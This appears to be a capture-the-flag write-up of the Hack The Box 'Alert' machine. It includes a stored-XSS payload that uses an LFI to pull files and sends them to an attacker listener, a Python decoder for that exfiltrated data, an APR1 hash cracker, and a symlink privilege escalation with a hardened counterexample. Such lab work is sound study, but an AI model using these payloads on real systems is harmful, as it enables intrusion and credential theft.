dabu3393/Alert-HTB-Machine

Hack The Box: Alert

Author: Davis Burrill
Difficulty: Easy


🗂 Repository Structure

Alert
├── nmap
│   ├── alert.nmap               # Full nmap scan results
│   ├── alert.gnmap              # Greppable nmap output for quick analysis
│   ├── alert.xml                # XML nmap output for detailed parsing
│   ├── alert_extended.nmap      # Extended nmap scan results
│   ├── alert_extended.gnmap     # Greppable extended nmap output
│   └── alert_extended.xml       # Extended XML nmap output
├── payloads
│   └── markdown_test.md         # Test markdown payload for XSS
├── fuff_results
│   └── index_fuzz               # ffuf output for the index.php?page=FUZZ run
├── Screenshots
│   ├── albert_passwd.png        # /etc/passwd retrieved via LFI
│   ├── alert_dash.png           # The dashboard
│   ├── base64.png               # Base64-encoded exfiltrated data
│   ├── config.png               # Apache configuration
│   ├── contact_page.png         # Contact page
│   ├── exfiltration_script.png  # XSS script used for exfiltration
│   ├── ffuf_pages.png           # ffuf results
│   ├── gobuster.png             # gobuster results
│   ├── hosts.png                # /etc/hosts modification
│   ├── line_sync.png            # Symbolic link creation
│   ├── markdown_viewer.png      # Markdown viewer
│   ├── monitors_dir.png         # monitors directory
│   ├── nc_output.png            # netcat capturing data
│   ├── nc_test.png              # netcat test
│   ├── nmap.png                 # nmap results
│   ├── passwd.png               # /etc/passwd
│   ├── statistics_login.png     # Login page
│   ├── user_flag.png            # User flag
│   └── website_monitor.png      # Website monitor
└── albert_hash.txt              # albert's htpasswd hash (see Step 3)

1⃣ Enumeration 🔍

The first step in tackling the Alert machine was performing an nmap scan to enumerate open ports and services:

nmap -sSCV -Pn -oA nmap/alert_extended 10.10.11.44

Findings:

  • Open Ports:
    • Port 22: OpenSSH 8.2p1 (Ubuntu)
    • Port 80: Apache HTTP Server 2.4.41

Port 80 hosted a web application titled "Alert - Markdown Viewer". The site is addressed by the alert.htb hostname, so alert.htb was mapped to 10.10.11.44 in /etc/hosts before any of the web enumeration below. The application lets a visitor upload a markdown file and view it rendered, which raised the obvious question of how user-supplied markup is handled.


2⃣ Exploitation 💥

Step 1: Enumerating the Web Application

Fuzzing for Endpoints

Used ffuf to discover additional pages and directories within the web application:

ffuf -w ~/SecLists/Discovery/Web-Content/common.txt -u 'http://alert.htb/index.php?page=FUZZ' -fs 690

Results (the default response, 690 bytes, was filtered out with -fs 690 so only pages that actually differ remain):

  • Discovered paths:
    • /about
    • /alert
    • /contact
    • /donate
    • /messages

Accessing /messages revealed messages.php, which takes the file to display as a file= parameter. A user-controlled filename handed straight to a file read is the classic Local File Inclusion (LFI) pattern, so this endpoint became the target for reading files off the box.


Step 2: Exploiting XSS and LFI

Initial XSS Test

Uploaded a .md file containing nothing but raw HTML, to see whether the viewer renders it unsanitised:

<script>
    alert(1);
</script>

The browser displayed the JavaScript alert when the file was viewed, confirming that script tags in uploaded markdown are rendered and executed: a stored XSS in the markdown viewer.

Data Exfiltration with XSS

Modified the payload so that, when the uploaded markdown is viewed, the script reads a file through messages.php?file= and sends it base64-encoded to a listener. The Contact Us page is the delivery channel: the link to the uploaded file is submitted there, so the script runs in the browser of whoever opens it on the other side, with that user's access to messages.php rather than ours:

<script>
// Runs in the browser of whoever opens the shared link; the LFI read below
// is made with that browser's session, so messages.php answers with the
// viewer's access level, not ours.
var url = "http://alert.htb/messages.php?file=../../../../../etc/passwd";
// Listener under our control (nc -l 9001). The file content travels in the query string.
var attacker = "http://10.10.14.3:9001/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        // btoa() folds the whole response into one token; encodeURI() leaves the
        // base64 characters + / = unescaped, which a raw nc listener shows verbatim.
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)));
    }
};
xhr.open("GET", url, true);
xhr.send(null);
</script>
  1. Uploaded this payload as a .md file and clicked "View Markdown" to obtain its link.
  2. Started a listener with nc -l 9001 on the attacking machine (the host and port the payload calls back to) before sharing the link, so the callback is not missed.
  3. Submitted the link through the Contact Us page.
  4. Received the base64-encoded data on the listener and decoded it in CyberChef; repeating the process with other file paths retrieved the remaining sensitive files.
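The listener-plus-CyberChef step can be collapsed into one script. The following is an added example (not from the writeup or the repository): a listener that behaves like nc -l 9001 but decodes each callback as it arrives, with the decoding isolated in decode_exfil_query so it can also be applied to a query string copied out of a proxy or framework log, where a form-decoding parser may already have turned the base64 "+" into a space. The 10.10.14.3:9001 endpoint and the /exfil path are the writeup's; the sample passwd lines and the function and class names are constructed here.

```python
import base64
import socketserver
from urllib.parse import unquote, urlsplit


def decode_exfil_query(query: str) -> str:
    """Turn the query string produced by  encodeURI(btoa(responseText))  back into text.

    btoa() uses the standard alphabet (+ / =) and encodeURI() leaves those three
    characters alone, so a raw listener receives the base64 verbatim. A parser that
    treats the query as form data converts '+' to ' '; that is undone here.
    """
    b64 = unquote(query).replace(" ", "+")
    b64 += "=" * (-len(b64) % 4)            # tolerate padding stripped by a relay
    # btoa() maps each code point 0..255 to one byte, so latin-1 restores the text
    return base64.b64decode(b64).decode("latin-1")


def decode_exfil_request(raw: bytes) -> str:
    """Decode one raw HTTP request as captured on the wire (request line first)."""
    request_line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        raise ValueError(f"not an HTTP request line: {request_line!r}")
    return decode_exfil_query(urlsplit(target).query)


class ExfilHandler(socketserver.StreamRequestHandler):
    """Minimal listener: read one request, decode it, answer 204, keep serving."""

    def handle(self) -> None:
        raw = self.rfile.readline()             # the request line carries everything
        while True:                             # drain the headers
            line = self.rfile.readline()
            if line in (b"\r\n", b"\n", b""):
                break
        try:
            content = decode_exfil_request(raw)
        except Exception as exc:                # a bad hit must not kill the listener
            content = f"<undecodable: {exc}>"
        print(f"--- from {self.client_address[0]} ---\n{content}")
        self.wfile.write(b"HTTP/1.1 204 No Content\r\nConnection: close\r\n\r\n")


def serve(port: int = 9001) -> None:
    """Listen on all interfaces, like `nc -l 9001`, but decode each callback."""
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("0.0.0.0", port), ExfilHandler) as srv:
        srv.serve_forever()


# Constructed sample callback, shaped like the payload's fetch() for a two-line /etc/passwd.
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\nalbert:x:1000:1000::/home/albert:/bin/bash\n"
SAMPLE_REQUEST = (
    b"GET /exfil?" + base64.b64encode(SAMPLE_PASSWD) + b" HTTP/1.1\r\n"
    b"Host: 10.10.14.3:9001\r\nOrigin: http://alert.htb\r\n\r\n"
)

if __name__ == "__main__":
    print(decode_exfil_request(SAMPLE_REQUEST))   # or serve(9001) to replace nc
```

Run serve(9001) in place of netcat; the 204 response keeps the victim's browser from retrying or surfacing an error, which matters when the same page is opened more than once.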

Step 3: Cracking Password Hashes

Extracting Hashes

Among the files pulled back this way was an Apache htpasswd file with an entry for albert (the hash is saved in the repo as albert_hash.txt):

$apr1$MoRBJOg$***************

Cracking Hashes with Hashcat

The $apr1$ prefix identifies Apache's APR1 MD5 scheme, hashcat mode 1600; a straight dictionary attack (-a 0) with rockyou.txt was enough:

hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Results:

  • rockyou.txt contained albert's password. APR1 is 1,000 rounds of MD5 with no tunable cost, so a wordlist of that size is exhausted in seconds on ordinary hardware.
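To make concrete what hashcat mode 1600 is computing, here is an added example (mine, not the writeup's): a pure-Python implementation of the APR1 scheme, which is the classic md5crypt algorithm with the magic string "$apr1$" in place of "$1$", plus a dictionary attack over an htpasswd line. The sample entry, its salt and the wordlist are constructed for the example and are not the box's values; the function names are my own.

```python
import hashlib
import hmac

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    # crypt(3)-style base64: low 6 bits first, no padding
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5_crypt(password: bytes, salt: bytes, magic: bytes = b"$apr1$") -> str:
    """Apache APR1 ($apr1$) / classic md5crypt ($1$) password hash."""
    salt = salt[:8]                           # both schemes use at most 8 salt bytes
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                      # mix in alt, one byte per password byte
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bits = len(password)
    while bits:                               # walk the bits of the password length
        ctx.update(b"\x00" if bits & 1 else password[:1])
        bits >>= 1
    final = ctx.digest()
    for i in range(1000):                     # fixed 1,000 rounds: no tunable work factor
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    encoded = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def verify(password: str, stored: str) -> bool:
    """Check a candidate against a $apr1$salt$hash or $1$salt$hash string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[1] not in ("apr1", "1"):
        raise ValueError("not an apr1/md5crypt hash")
    magic = f"${parts[1]}$".encode()
    candidate = md5_crypt(password.encode(), parts[2].encode(), magic)
    return hmac.compare_digest(candidate, stored)


def crack_htpasswd(line: str, wordlist):
    """Dictionary attack on one htpasswd line; returns (user, password) or None."""
    user, stored = line.strip().split(":", 1)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if verify(word, stored):
            return user, word
    return None


# Constructed sample: the salt, password and wordlist are made up for this example.
SAMPLE_LINE = "albert:" + md5_crypt(b"example-pass-2024", b"Xq7kL2pA")
SAMPLE_WORDLIST = ["123456", "password", "letmein", "example-pass-2024", "qwerty"]

if __name__ == "__main__":
    print(crack_htpasswd(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The loop is the whole cost model: each candidate costs roughly a thousand MD5 calls and nothing else, which is why a GPU run through rockyou.txt against a single APR1 hash is a matter of seconds, and why htpasswd files should use bcrypt (htpasswd -B) and never be readable by the web application itself.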

Step 4: Gaining User Access

SSH Access

Used the cracked password to SSH into the machine as user albert:

ssh albert@alert.htb

Verification:

  • Accessed the user.txt flag in Albert's home directory.

Identifying Running Processes

Executed ps aux | grep 8080 to see which process was bound to that local port:

albert@alert:~$ ps aux | grep 8080
root         999  0.0  0.6 207256 26524 ?        Ss   Feb05   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor

This showed PHP's built-in web server (php -S) serving /opt/website-monitor on 127.0.0.1:8080. Two details matter for what follows: it is reachable only from the box itself, and it runs as root, so every file it serves is opened with root privileges.


3⃣ Privilege Escalation ⬆️

Vulnerability in /opt/website-monitor

The PHP built-in server found above runs as root and serves /opt/website-monitor. The application keeps its monitoring scripts and logs in the monitors directory, which albert can write to, and the server follows symbolic links it finds there. That combination lets albert read any file root can: plant a link in monitors pointing at a root-only file and request it through the web interface.

ln -s /root/root.txt root.txt
cat root.txt

The link was created inside /opt/website-monitor/monitors. Reading it directly (cat root.txt as albert) is refused, because the permission check applies to the link target, not the link; fetching http://127.0.0.1:8080/monitors/root.txt instead makes the root-owned server open the target on albert's behalf and return the root flag.
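The root cause is a privileged file server that follows symlinks out of a user-writable directory. As an added example (not the box's code and not the writeup's), the two functions below contrast a naive serve-the-path routine with one that checks the resolved target against the document root and opens the final component with O_NOFOLLOW; demo() rebuilds the layout in a temporary directory (a stand-in for /opt/website-monitor with a monitors/ subdirectory and a secret file outside it) and plants the same monitors/root.txt link. The function names and the sample flag text are mine.

```python
import os
import tempfile


def serve_file_naive(docroot: str, request_path: str) -> bytes:
    """The pattern that leaks /root/root.txt: join the path and open whatever is
    there, following links wherever they point. Run as root, this reads anything."""
    path = os.path.join(docroot, request_path.lstrip("/"))
    with open(path, "rb") as fh:
        return fh.read()


def serve_file_hardened(docroot: str, request_path: str) -> bytes:
    """Same interface, two checks: (1) the fully resolved target must lie inside
    the docroot, which rejects both ../ escapes and symlinks that leave it;
    (2) the final component is opened with O_NOFOLLOW so a link swapped in after
    the check cannot redirect the open (a full fix would also drop privileges)."""
    root = os.path.realpath(docroot)
    path = os.path.join(root, request_path.lstrip("/"))
    resolved = os.path.realpath(path)
    if resolved != root and not resolved.startswith(root + os.sep):
        raise PermissionError(f"{request_path}: resolves outside the docroot")
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # ELOOP if the last component is a link
    with os.fdopen(fd, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Recreate the layout from the box in a scratch directory and serve the
    planted link through both routines. Returns what each one produced."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "root.txt")            # stands in for /root/root.txt
        docroot = os.path.join(tmp, "website-monitor")    # stands in for /opt/website-monitor
        monitors = os.path.join(docroot, "monitors")      # the user-writable directory
        os.makedirs(monitors)
        with open(secret, "wb") as fh:
            fh.write(b"<constructed flag>\n")
        os.symlink(secret, os.path.join(monitors, "root.txt"))   # ln -s /root/root.txt root.txt

        results = {"naive": serve_file_naive(docroot, "/monitors/root.txt")}
        try:
            serve_file_hardened(docroot, "/monitors/root.txt")
            results["hardened"] = "served"
        except OSError as exc:                 # PermissionError from the containment check
            results["hardened"] = type(exc).__name__
        # an ordinary file under the docroot is still served by the hardened version
        with open(os.path.join(monitors, "status.txt"), "wb") as fh:
            fh.write(b"ok\n")
        results["regular"] = serve_file_hardened(docroot, "/monitors/status.txt")
        return results


if __name__ == "__main__":
    print(demo())
```

The containment check is what closes this particular hole; O_NOFOLLOW only narrows the race between the check and the open. Neither substitutes for not running the server as root, and a built-in development server like php -S has no business being root-owned on a production host at all.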


4⃣ Screenshots 📸

  1. LFI Exploit: Screenshot of successfully retrieving sensitive files.
  2. Markdown Viewer: Screenshot of payload upload and "Share Markdown" action.
  3. Netcat Listener: Screenshot capturing base64 data from the listener.
  4. Hashcat Crack: Screenshot of hashcat cracking the user password.
  5. SSH Access: Screenshot verifying successful SSH access.
  6. Privilege Escalation: Screenshot demonstrating the symbolic link exploit.

🔹 Key Takeaways

  • Vulnerabilities used: stored XSS in the markdown viewer, Local File Inclusion in messages.php (reached through the XSS), a crackable APR1 htpasswd hash, and a root-run web server that follows symbolic links out of a user-writable directory.
  • Techniques Learned:
    • Using ffuf for web application fuzzing.
    • Automating data exfiltration with crafted payloads.
    • Cracking hashes with hashcat.
    • Exploiting symbolic links for privilege escalation.

🔗 Links

Happy Hacking! 🚀
